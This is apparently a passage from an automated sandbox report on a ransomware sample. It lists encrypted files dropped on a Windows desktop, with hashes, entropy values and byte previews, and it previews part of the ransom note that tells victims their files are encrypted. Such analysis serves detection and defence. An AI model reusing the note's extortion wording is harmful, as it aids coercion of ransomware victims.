          Preview: u}.$..`Q..1v..f.9=..ul.....3..P...A.K5..>..fyl..{....t.P......n...U....~....."...s.....6.....S..6.......w....3g...I..H..{....s...If,|.+S.H.c.x1MM..q..@.`R.6..#...).._b.'...S.......}U.._....N..s..n<.?hf.~...M2..f.._..K. ....x_.O.-4.u.F.+...).........../.Q#.......(...6.w...T.pA...>?./.".~.t).?#.E]...m[..h......3...u.... U..x,.;UB...;.....O....P5f{b..S.....?Y.. ......YTyr.1:.....'......Thu..0..0.l|8.....9.j..7..l..=L6........{....<..o..9@.sdn...h.....90U^R......].LY...*5..3*.......'m8D..0.=~.Rlr...i...."..LA.`^...$...BpY..?....<.G.YO.."z.O>.....f@...........-.6-...B.f.:4.l......Pe....!.Z.......t@..lk1...6..)1.3P...@..}.Z>.....{...~.I...g...*5Cq...........z...1.-~b.k...<.|.kp%...@K..N.'.f.+q..."..Nm.I.v(.s..M.u...#..H.<>..90...S...H.Z"S5..3P.........Qm....`..\v(J.f...U Uzj~|....Q.&..l...Gx._7.6:h..N.<.._...;:....|..7K..(w.=.C.oI.R9.%..K.@..[.h..?P....l.Y...^...+.E.......f.....o.ME..Qy.(..G....R...8...-.a..R..:...#.K%..Xl,c.Xz.im..2.r.j..2.e....).....$.C
          C:\Users\user\Desktop\WKXEWIOTXI\WKXEWIOTXI.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.854232788573278
          Encrypted:false
          SSDEEP:24:r1EYcsJt+u7hNbPR0UX8nLotN8nxNSTQfZ6vzigjmICujpXADn+ztxN:rSQJt++PlvX8Lu8nSsIvvCuZu+p
          MD5:7394DD4398D359E98F09572F58FA1B78
          SHA1:B6A6582A7EAE88C4AC2639B784DECE2C090E8941
          SHA-256:7F83896DE8BFF90AD01B05A73143E88543D4DDF7C08A33FDD4A5A530D64058C7
          SHA-512:C806A4204A6EBF5A77A52ABE563700663A67660FC0E7C2709B0E0F376E36C3EB6F353ADCDA2D8C404F3ABBED2D3DA7A27FAA59AB30CB0C3E7D100FD92389D5B4
          Malicious:false
          Preview: m]b....4.......:.!Q-.e.zW...l.....l...*Y..o.2_.....}.l...d..Nob..3_....2..x...."._............3Ew......I..~.)....[4.B...v..4......P.7z..s.......A.G..k..:f....N........j.r....E.....}nx.......=.q..6.....]...|.5..=L....nJ.BX*....b..A......s1.F@.*3c..lb..w.6{{..*.6L.j......8...=f..$.dul...Z.`...~..1@.J..T....<.U..%aM...._...S.nHv.Ozf......+.......H&....9.(.n{A...t.......ml"rA..+....d.+..~..b.....p~/.i.p......_d.+*...1...x.]b.......RCH.hp.t.y.u:...&..p!B1]t#.R.OD'6."!.<^..v..U|...p.e..x..F..+..?=V.V....\...y.7!V.h...[q.w/\Uc..14.;w..\+.a.B.........9H.......{o....o.(.j.r....1.m..)}..*M.[t.J.....@..E.?.f..s..uo..t.9..V.=.|!H.......].....].c.{.(..}.....eJ1]3.4.Q..-TU>.....c).~2$....~...(..p.uN.1.B.].]~.%.TM/..'..(...?..........BA..~..s.Zqi`kl8@.....:..c=.=...K].5.y:a..v..I.O.0.%...w9.Xk(..>.1.e..[0..........uF.._6.....\8Z2....".W......I%.N ...{...%M.,F..$R;F...wQk\-.#B...O....2..bW......}.. ....L.{..:&F...-&.dP...0...A.z{.7...,....?;
          C:\Users\user\Desktop\WKXEWIOTXI\ZQIXMVQGAH.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.849660825393839
          Encrypted:false
          SSDEEP:24:+iwqGTqczabd9VBd3jV7lYX5ET9TGSj/jsJRe2s96d2uY4BMYiUpXADn+zhyIn:wg9Fj25I9TbsJR49JH4Digu+Bn
          MD5:4DA612F44E78C2A0D0C5E468066E8220
          SHA1:0D6841716BE95DB1DEC9D4D7D80E986BA4AFCE9E
          SHA-256:9AE7C1CF4E1D11183C78AB93DFB76EF1CB871248CCFEA66A7FEDDAB37B6EADD1
          SHA-512:1F15DF77866A8DAFA72BFC698675BD5D798DF601FEC18EEB915700824E627FDDB17F84B2CAFFB47256B4857F63938F780EEC3CE004B9FFCE1D5B3EA2627E31BF
          Malicious:false
          Preview: .b`d..........=.......ro.,Q......j.....=.`.pDK..HX.$R0....dg.U..Q.nK..(Z.....m....N..g'Azz^.+......B.m....4.5...Cd...;...A..Zw..,........Zhu,\.IU..%.p;.K...s....+4q!.W%lX{.....@..[...!......S....../.M!...L...=..{i......I...+.....P..xd(.GM....c:...........1<w....<..4.Zu-..b.|.:.M.a.>.TX..z....J>1..@.&H....o.)...&.$......a..<.e.....5..}......,..]..(.Y...).@...[....?8.*>hy...0..V...r-.!G..{]./>.^.9...n.+..zt....!..s..d.s..|....[...|9l/...S-.."&......#..4...O...gl..K.G&V....<...i.K>..~...eq"..t.?......\.j.>I...'.f.\-..25.<....p...!].8..j.MI....B.c...pfj~.....93.%.F......}.I..;X...P:...V.pY.u=....m.X.....q.Y..vRm".....m..zn.;.!......i.f8~..r.i..B..x..~...D$1..T....(]p..`b......L..:.vBL..0..Y..?^.....Xw\.....?.....M...s..ID>..N.Ww.j ....VQ~....r.....D..1.......b...8.o...V..T....L.6z...I."%...........Q.8U.W...du..-.#.9r......4.dX.r..N...nnU..~.b..F......../}..q.(.X..~..P?/.Wx..NA..={i5<.j-Pqc.a.&Y\)".oY.7.M..X@...8........J.{......(.L..
          C:\Users\user\Desktop\WKXEWIOTXI\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\ZQIXMVQGAH.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.856462513464044
          Encrypted:false
          SSDEEP:24:vKZJWWY60znUeNgyAUcNTaaMpUldcZchtxp1O//GMDrnJXADn+zsZk:4JWWY60zUeNluTfMIfRp1kG6u+Ya
          MD5:BE74EC45614134149B6F9B457C57C4F6
          SHA1:04F6FBB8A75F87328B6CDB7E3FEA5A4BE0FA1181
          SHA-256:A3C61BE50BC97B3FDF6C65173649A0C4586267619522632F9E818357794644D3
          SHA-512:DE762ACD1C9A3365B6B1B6424EDE98828EECBB01D1D8D20ECBC7185733535FDF2632CCD49D2FD252500B8436FB86EE06D3D95EF7B0AE456AE3D3EC027608CB9E
          Malicious:false
          Preview: .u.'.[L.h..:6...........].N3...[Dy.........!,P..._/.b.5.....&uU.(.(....w.....g..U..g...4.......M.'.....;:P2G.......]l....cg..m..F..=....&.?.K.z`...yb....=.n....:.&..1.w:G.1.IW..H..U...0..'..o..........4.Y......-.....x.&.I.X,..d....P....G[Y(....R.2.%.'.|.T.....f.!.D.7.I3....-.\..R[n.*.1I.wT.{....]...D....). /..M.\~dm.Y._....eXx#...6.....{_W....?.t8<Rw..G....F.).......,....y9.m...c.....ulSD.......K..H$Y...z..{...V.....ke.....1...?.Z.Q ............#.z.5b>.h]..k.j.*g..........9...*prb.7U..a}.../.....5.....y.....Vj.n.R....Vx....b........u..*..}+..\e.A<..3.&M.y.'n..C;'.I:...E.+...RM[[.......~Hy.._.=..B.<..x.L.....9..p.^.G.I}.....8.&3_\-.....G......./.h..R.q)..<K..v......~.!...l.....0.....}.....r...Tn.U6.....C..<..i...........|...3.!.....Y....D.@....d&....+f. %K...NA.b._+-cT.$.CSG....;6........i.LZX E-...<..J~....(...Ub.....vU.M..{..z.I....eG...~.T...<.v..-5.......`+F.........t..e....x....Uu...i...P.$F`.-..".S6d.V.....*.U.sv.J.(..
          C:\Users\user\Desktop\ZQIXMVQGAH.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.840953421603471
          Encrypted:false
          SSDEEP:24:oO3iSndLf+DLWYkeQcIfNaQ7+kUbi+mVL4rCYlotkbnpXCXADn+zX:oodLyceQvE7kUqB4rCjSbnpXeu+j
          MD5:C79782FB7A83B392132FF5DDCB734511
          SHA1:3D69E2B6AC041D1A216A908852AB03BD584C0325
          SHA-256:E9005C1FC1716CBF0BC9827F2367802E96EEBA902CB305788549F495C27AA8C0
          SHA-512:ECF24C17F5F09D5BECEDAB38CC6A29A4E58F9DF6CD276EF3700656656A89C9101FDF2204F4936FB30C93B3EF11F4D0998C4103FE8C1BC57A8B579F32F6437EB7
          Malicious:false
          Preview: .T...^s. ..b2'.k....pH.V.#.p.[..MOR...1yUwc......c.c.....}u\..Q......Gf`.#..B.1P.72..`...........a..^....<8.`.c.1.'..2..Y...[4...4<.3w..V..Qy6.n.].b.;.,.DX.W..:5..o.......i..=.,;..x*C........q...H.`= ).....F.<.........N.<).,&..#.Q..)\.EV..%_..o7...A....0PNI.3..AN..R...t..6;R"....0.....E.>.`.g.IB...!......p..)......Fcj...........Q}5. .....Fm.3..U...M.Cj.....I.Sa.8zk..I.H.....6..4.j,.h.0....|t[.Wm. ..,......h+.x0..v.....;...v]y.Z1.`)..~.E.. S..?z=fT...-...+.U..i)H9Q.5f........D.....!...Y.@5.QH,.....=....e........$..4H.i....~[..#..a..S..;..a.3..-U...^|...9B.M..o5......3.F....PpR!......hO~..<}...F"3..4".;.`M&.........#..3.'`...d-8KsK/..j.[.40..Tv......Gd..A..k.H.k&C.N.....%.1T.*..G!..~.....R^...;....o.....Q.V`O..z`r...w].W....vLsH..j....H*.A...D...X...(|...5%..\....0...j\.........!....w..j...v.n...}..x._LJ..^.@.t.B.........".<..'>9.9S...t..A0.F)u.H.n.=v.......d..... .'~q.|".9.,....A0...f...B.6.....P\.b'.2....$w.....J.1V..
          C:\Users\user\Desktop\ZQIXMVQGAH.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.8367714203235925
          Encrypted:false
          SSDEEP:24:7nhjYaW+lyplHWkOcVc9hnk0RQ0eTcowrv2bWwr0b10LTcKXADn+zbB:7n9YaW+lkWkO3/nk0RJe4oDJ0h0ju+/B
          MD5:34B8EB547D04E4E7F7F30901434618E3
          SHA1:AE00AE6ADF718F511B4674ADCDF3FC9A7EFB2D88
          SHA-256:A525A5AA38C266DE0389EA9621CDFE8A4756AFE3925A3DBF02F0D453DC51CEF9
          SHA-512:D7A5263DD228C01ABB36E902BC5FAA3FD861302F2A32C34F5E55CD31EDB890CA837E6EC580B3BE53383F82292EE409B1991B6C43F8F104567364148C7A815D19
          Malicious:false
          Preview: .0...U.....y5.!)..h4.a..7.....On....[DV;.IH..7I>.Q.z....V].(.9...k.\......~Il...])C.M.=......`v.-..d....`...u..j......=..p.`.&L[.p^4........._r..Zy.)..).t.SK>...o..&.5.'{.|.!.u.LoTU......KW......wM.....t&...g.rxQ."Q5........;qd...).R..J6....H......E..@)...t."cq.,.F.M9. .~..M.(.Gxj.F..[S.........OPF..]&..w.P. ..7.....)..f.J...V....I|.'$O..}}l3.76....?b...p.^...c!....h.~.bV1...m\...w..2kFM-...t...m.I..#.....-p.,z.We.J..=.-...lQf....L.f.A.....U.4.e....=y....^T.Y.YL..V.l.T.~~.O.@5....K....r...?1sX...d..aj..eix.R^".[...oo..6H;+..j#ZA..).T....<........d.Z&}..j<.y...MTaX..x.f.O ...O7a.bl)...2...&.m.n.8..iK.i.#.r.H. .l!..u.....H......kgB.x.u..u.>@#m.7..I.....%.*O."8..ng.P.7....i...c:...{.c...x3KmdC.sk..c.!...^y...l.N.......<.U.}..>X.x.1...k..mbq`.r.kU.r.Cb.8t..t.K..1.n&.~.&d.l..0...U..8]....A...)...9.0...W.;....T.....=....Ke/...M..c.?."..Oa.5....dp..2....mjM.w..R.*N.&.4.r.pQ.3.\..g.Tge.....0)...:...~e ..H....0.-4^H\}.bp.......m./...'GA.lQ6...n6
          C:\Users\user\Desktop\ZTGJILHXQB.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.843480389886071
          Encrypted:false
          SSDEEP:24:z/FQle5mrMhXJifYAJ7OGmHnt/6SQHNcFrBsgsSPo98gdpyjnHkACsSbXADn+zRn:bul1AhcgAsGYtjfFP2NpyjnEACsSTu+F
          MD5:B1DAF9D6C8197B9BCE19E16C16818748
          SHA1:2D288846930A223C07BC9C5A32E39662C9860543
          SHA-256:D42A6FD91535B3D6E41EB79EBC2232B06E523F150AC396AAC6B8165FAE8CEEDE
          SHA-512:EC882872BFA8F9601C53D376E472B12F33968F58F03417FFE862452974A8C483299461B30A2A536F5723E9109B6DAB672DD422CCE1EED4E092904A9DCEEBBCE0
          Malicious:false
          Preview: H^.H.....@.Q....w....,Q....es1...I.........C.e...cy0NU&.,5}.wzN........)1...#.....dU...A.P.k.|.7xt..."..l...Z..q.T.68.|...<X3..j\/.|?...l.d.J.G......^..aO`m."..{...F.1.I.,.....n....j.......J..y+...X])..p..n*z4.b./.2.2..'..p2.s.Y ....z....vF.6.&.u4C..e.k.$...]...N1.l...<..Q..d.0.W....`.7..-) ...VC.........fv.........]xu.u....n.V...OZm......>.......g{7..i.a=.yh.l......n.k...O<.d.leB|..........q...G^....mR....u..[4&4...+.S.%@-..t..i....u'Qhw...Y...u......./u.-g......LB.........Y.Z3y..f.BSH1..t#{u@;F...Fc....gk.....sR.J5$....Y...].........Wr..g.i.W>&.!s.g_:~....-.A.....[.y......j...D..>...2.w&1.....?..4..._....E.....G-j..O7x...{..2.m..r.8.r...$..{t..|..t.4.U.u>s...=*1.!b...W....n.$!.w.n$,d[I....a.}.3.K..h.P...-$aynj.K......d.y..A..ji.=>.9..l....T.^j..Y.F.@.*!5...7.k.....n..l^...+?.?E.....la.|.r.k..t!}.....}_..+..>.x..k...G..BA...a..[nA.M..E..Q.D..`.f.&.^.h..R....Z.S....~ a.....EH.......J...v.p.^....."w...0..E8F.z.4Z.(l.F8..c.:.%.:.........
          C:\Users\user\Desktop\ZTGJILHXQB.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.844228057796375
          Encrypted:false
          SSDEEP:24:SpXLN6Gc3QHhzHBqLUyReoSYCrfMcG3RduzHV3mffV1kXADn+zOW:qXEGcAxB0UiLcw3nt3ou+yW
          MD5:C192573D0FE63112726FD10DE8C618DF
          SHA1:D7729C1FFF10580B496E738AE040687995B12CD5
          SHA-256:FB805D12D05A0AC3B3E0705610A2D3F26DB8745C401E0D900BDB9104D03DC836
          SHA-512:4B5650433153EC7675405AF95A4B8E2BD2651F6308A1E18F2B926F0AB682E19B2F36D73B672D0F6DF8EFB1CBCDFE9588E88C4D63D7D990802A8C512DF4D14BDA
          Malicious:false
          Preview: ......i..K......e.1i?fE.>kc.`........L.5..'p%2R.......$..-...\..Y....=W.g....Z..O..........&..C.........Y.Xh.u...g[...&G.........X9..$"..-..48...@.gm.$.jD..2.~.26:.X0.....Z&Y0;..G.......fgc.....u..|..15....B...U..#g;Oo..pX2..Q..g9.p..w.kh.....=.@..5..Y.'....]2.M...C.Q. |S...r.d.8..h.!..."..H....Z..+.R.s.a5..<.....r...e... ....|......v\k.1.`....@.c..#.'..\4LSZ9.FI...L....w#..v...;.eN...`9fw..Y6.-`...#..?...Q. I.k.5.4p.O.oFB.E....qE..al-.w...fD^.Q.yJ..4.C>.......^S.|..........i!).......~|~...;.Ta\WL....$/...6..cfIl.(...m^[....6./......F>a:.Z..8.....mY.li.N..5&..L.c.K\G{...yv.1.J....p!...3.Y...."4K$.oz........dX...+...v.VnO.@..N(B.........\xoyo..@X'U.3Grn...\.p.n7.\B..a5u../....J........SGN..4D...i...$.9.n.e..s.Q.cz.QU.H..M.yI2...m.........a..Y.#zn.@MQ9........".c.Xf7..o..j.z.U......x#.P.y6AQ......[.....]\...<.^....9.....d..e.G.*..^e.....P%.E...Y(..8'.H.%...r.2.~........?!.....=..T.s..>v?J.)....Ho.....Ze..7../q:..6...$....
          C:\Users\user\Desktop\ZTGJILHXQB\IPKGELNTQY.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.816718805089984
          Encrypted:false
          SSDEEP:24:7AwKq8fX5WJ9QZ+5yF5Gxx78eGX6N8zfHB2jGwFc6q/i/UB34XADn+zRHWA:58/5kY+I5GP7LGX6N8rHB2j1qitu+1HD
          MD5:F83645C65F9CC217422064127E49AC70
          SHA1:06BC96BA74DBDBD29E11D7092C13C7C0356F1C7A
          SHA-256:7836A6A59EA5C69B7D63806F3ED5163E4B5DC40766F8AC7D58E0AEBCBD158ED4
          SHA-512:CC46E0CB4781DCDEC85B28D14A71EA1F3E084F0AAD222B4BD2513A88AB7B7EA2D5DAA4590BD6FE9F4DF503D2C257AE9B9DC93FA622377BCCC31E729458AF64D6
          Malicious:false
          Preview: ....0..C.I...(...Cf.../.iX....d.s..Y5.R.E..T...9g..X..:.9......[y....e%.L.n...&.i....#..z.+]9..3O.8o..{~h.$zU...zN:...>............z.4....E.....!.vgT.99..C.0..65.d.n..UHiM5.l...R.6.6r..rO.F........l..5t}.%..q..r..D...`O....l.)24{..'B2..k.W\...|}U.Dh....2...J.gtg..0..I.'.,.$..3..8xH.9.'.......=`h..............:X-.TC...S.F...o..)....{z...j.i..2.L.V..]......O.B.2..O1.6'-g.?5.Ba/{f....&.n6+...|.`..............%..."?<..`8h..-4.[.....W.0.....D.].^B..B^.BU.Zca.{+.z"-4..y.\96/..I.+Gz]...d.!.]l..#Z......-g..'...V.z.....y....c>TTr......{..g.D........*i...g!.[.3...0..^..O...,.c......t..|."3....p6....v....m .R..H.%..bC.%....E...G....~D.IZBL.......U0"c./!.R.........a...}...r..!.(..(.W\v......l..e.h.qs....f.....g.a].BE...%..!.E.:....Z.........d{Q.X.g......nMz..$c.9.e.3,...|../..r.....,>...y...lNo.....f......O.G....\...g!..1.N.?.........T..[........_.:...@.f..u.....NIN..+..8d.N8Xh.N.h..8....w..>.S.....;...B.....u.f.d...J.2l....A....nz...,6....~j0.."tR*.
          C:\Users\user\Desktop\ZTGJILHXQB\PIVFAGEAAV.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.839380775521346
          Encrypted:false
          SSDEEP:24:wyHtZjUYySWoMs+IPNzSzl8BemS9AeA0yas/Ve5UCNTKZTAdztAXADn+zGx:rHEaLkmUA/asteqGTeAt4u+i
          MD5:DD6FF0D5B5194BE124F75925BBC742E8
          SHA1:B5D709620B287510311EC19DA81698DEF3E2DB4A
          SHA-256:9FC4D3FEA5F93A04A8887C8B6E79F928DAA0C971062A209CC0021637C1FA5EA4
          SHA-512:4730AE9BA70366A4F47290819BF0F58A90088CB3580FA19212960514FFA042CCA7ACC7E54B30E29DC3692BCDBE1F2B0126855CA2045C7B99F37DE901093CF52A
          Malicious:false
          Preview: .*...(.m......8......n.4..X.C.f....>....@..4.._Z..d.(...H.R......-...m....{.`.5.......1.&..h..)P.....%.!............W.....Dez.]...g.6....r.....Fy4.9^...X2.*..X..`0....=...J]B8~........a..qX..|..A..l.[..s.....O......+.s|....._.K..v.t...s.}....x..M...f......3........w.cc,.....6..|.&..u.d.v...|.*v..C......8.j...*....;..BhwO.Q..*.....y...?.4|.Vw.45.&...,&...O.W..B...&c..Vm....,........AG_.!v.i..0.f...>....R..|.....).D/....[..2....&.!..>.Fc...g....)..N.b...Xn.a:...D...8..z...^.}..b.......a...o<.Ram..$.\..4.P.-.......2>."I.........z..|.BV.NL.X.J"E.c..e.o.#Z7...7dE....2R.W..s.z....Kz..+....5.q8.....6...m.%;J.HL..T@..,.."dF...iY..;.7Vw..7.!CS...GF'.S5.nnd[Bea[\.D.n.X.}.E..R..B...i.. .7.S%(i..M..n9_............"P....R+...Ge./5.6,;=..{.J...-?)...'......#.TK..a....h.5..q&..#-A.P.Ss.?}...w......O.0&..:.K.........DQZ\>....n..g..q...a...2.<..2......I......6..12 j..8..t.........ug. ......i&i*<..`.l.?...q%Y..Y..oly......x..l....V..K..k*..!..$.
          C:\Users\user\Desktop\ZTGJILHXQB\QCFWYSKMHA.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.866030602232337
          Encrypted:false
          SSDEEP:24:2otbXl1Yz8+lHBqy+31PH8CkCnINjAn193iwTqQy6vwvcLXADn+zZjOIv:2Q1Yz8+0pRkWFnbiCqQykju+ljDv
          MD5:515C420104DE4447560CE6FF82D80832
          SHA1:9B47B8645F690548FFE0B07BFFB01B686C968DA1
          SHA-256:B98D384369B4303A082DC1A52D4A7A6E3892D6B82C282FE3B9825DC695243D05
          SHA-512:5F3D9BF245D138B6A995DF585335FD70518147779E778E274F0D2F17C549C671C8FBBA03AA873022227DFFC3E9921D7DB8DB9A02A47C37A0FADE72B7C660040A
          Malicious:true
          Preview: ...4H$.....Z?.6.)..W...E...:....~..ix..!.z....S.v..^....L.Q5J@...Vj..V..5x....o...pHh.9[>].....v.HU..A..cZ...A,J..LG.V.o....n............G7".....\.#a.d.f.u...z.6>G.....+......F}I.>....g.MV5.....rJ...O.E..'.0R'...w..X.(.....+x.q..0.....U/...J.JQD..k.B.t.H.V.z]To.~@+..s4.-E.....*....:..`.Yv.0:.-... .%..&u.x..8~..)W.Q....k\@.......'....C.._..z..B.....K.a........N..;.\.)..8..jl..0...I.r....".j.UM.BF.t....v'.....[y=.....HTCb..f..9.N..e.N..U]m=.Z..K..mG`f:Yi<..6h......*@..u.k..r..Q..M...Jj.....R.l....&7}..h.~[s/...."...w.............<-..w.NW5..y....d+.*q>....".....=E.?Z.P....(...r.[......T..P...8p.U,.e........O....N.:.(BN;.R.a.Q.d..?|..(...? $..m.DYX..:.Y*....>..1......f....<..,z.a..GA.>.G..8.k..2~.J..=WY.4ARLR...H*....E...?...h...(......d.......z4.....o28..v..B..^..."jdw...&..s..r\K..........d.R..5?.A...z.....&2...}Z.}P..3..+D,k...Ah;..V.l.7PY...B....R.(*S.^-.mS..w..pG......i'.........4l.. qE..v..bU.._6.............*...g.z..`....
          C:\Users\user\Desktop\ZTGJILHXQB\UOOJJOZIRH.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.86323651837165
          Encrypted:false
          SSDEEP:24:ZYlP4Maantr/YlPygVOviIQIAqQXrE6gh9qOhkfxg0CXADn+zVSQ2:ZYzpV/YlPDVhRIAVXrEPHhhkfGu+oQ2
          MD5:1C67978998D176C6DCFFDEA8ABAC763C
          SHA1:E80B24282711D4261F197E4ED0D37816584F66A5
          SHA-256:AFB5A6AB91868C62FA463B48EF58EC713759DE7930AA16B2FB1744C9B61FED66
          SHA-512:3BD0F3E2E9D20294535317929E04432D9296FD7E85A5FFA17D289D862667B6AA2B2A6D96F5BCD59282699C2194BCBE0DFB2AC0784D04AF0DDA3D552C6D5CCDEE
          Malicious:false
          Preview: ..H.&......W.0.C.rD:.....f.B.J(:.C........J...`f.m..1.4K'.=...7N.x..d.B.....|.\.#s.. ...!\.ka.........i]....o....w.........t.d..H.2...~..x.k5.....s~.:..<.dZp.@6`..DU2.tq..BG..Y.3...r}c.[..!.^....[)T7.v-j-.epj.zt.]l9.6phrh. /2..".NA..f.?....P.L.zdy../..W.wU.....Ml........8...pl..C;.{.z...w.....Z.2b!.vz0BM..H.l..kd..x#..^3..u....$.Qe.m.....D..F..H..n..W.D]._.V...*.fa...K..^....F.H...<..N..s.Z.$..f.A&..Fhgqh.................JgW..+.9.........u...v...4..|0paCs.......8..b%.....L.J..|@|.......1T.%>*.....{..::(....5rV..\.}...7...Y..".m..xuXQ...B...@....z..Z.9*...>.r3.A.C...f.A.rq}.;.#@..<.i\...nR..R...BS.d...:.....E..+X.:....'.....m...<...:S..~...F@f%..n.EC.I`....q.....q^I........Q6CY.}.[...!y.2....q.y....7.G...?.B...\.4..e..<.9.Ee.t......\....,...4..)iJ..`.l..e..Y8..4.............|.>....ia].%<.b..........N...N..uL.,.p.....6u.l....>.E..").<^..,+U.db.......S.*..f;c.q...O.#.i3e'..z....L......Y.K.>...*p....'<J..w..@Z.....s.a<J.v....*.}..N..C.....q.
          C:\Users\user\Desktop\ZTGJILHXQB\ZQIXMVQGAH.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.8447331440222845
          Encrypted:false
          SSDEEP:24:fGjz2warpjZZpcUDXns8L3F9k4aLVFx3VWqXoNkRjDBSXADn+zZhnq:SzzyjZZpcUD3s0A9LHbWB6VOu+thq
          MD5:87B08F4781CAE8AB22C621448BEBD693
          SHA1:6D15E33AEA49746A9438579AE83E6CBE53E68B9A
          SHA-256:8A05A9B34100F471EF86735CFCBDFF90045EDC108D11973AB8F60CC822A9F3E8
          SHA-512:138E3FF8CC64DCB8933F8DFA97C49E90343DF87189E551ECE63BF5B788A811555581EC439731A76CB89346F13EE42D41B49B68BDC7E01F73DC0B1F657E19091A
          Malicious:false
          Preview: .!..s0x^.@.."..h..|>.tP..Q.,j$....iD...5...8.1.hs.e=`q8.b..,.u.49x#X%....k...d..A..k.(B..2M.S.J.d...C.\.l.h..Y.>l..iGK..C....T:......G.X.<r.@.h[.....B2K..O......=..1..!J._C...Fw1.*.Nqd..?..PI...).c..-.+.O.L ...../o..6..../.Q=N.....(K.....?.(.......}&z....[s}T.V.=..~...c...4..T.....k.U...I..57._U.m.....4S...L...+......3.8.qMj.d.^.n.|.....y,..5p....o.........)V.@g..3Z..@.B.....D..a...-..N..{.^.S.{rH.....P..........r..y..b..f.D..A.r..Sp8nx.@.....%[.....|Be..."..#40....h.A3S.bU..].....m..g..B.K~Pd<@.N.Xe......')ZW.....@...S.6..<T].....1?4......`.H.!......bL.H..:..Z........-......l.y.zW>.b...dx.M...7.F.V."9T.....1n............l...{K....hv#....+...e::..c...(.)^..$@..0..V...M:....y...@pa....Dc.......5P#.Z+.....q....^...6..g.#92.3%p.`...D.."...&H.....6..........s.v.|...n..L...Q..r^..s#.3...tE;lp.w..j .z....c...;.b...q..[.u..d..$".JW...%.G........P.K....l.d(..QL..s..J*.....3.Z5]...4q=.....}"....H.{.Va..0....l..N..m. ...=..3...Z..+...b.9.w....
          C:\Users\user\Desktop\ZTGJILHXQB\ZTGJILHXQB.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.859237866278076
          Encrypted:false
          SSDEEP:24:Z/D4N4dhK0PCucNU/Ws1eXHnIJpoDro5js08baRtdk3Yg00XADn+zpM6IE:BMN4dA06hU+sUX2GXMjybqW3Yg00u+64
          MD5:D9D4850151BA69171DC36FB9989D598F
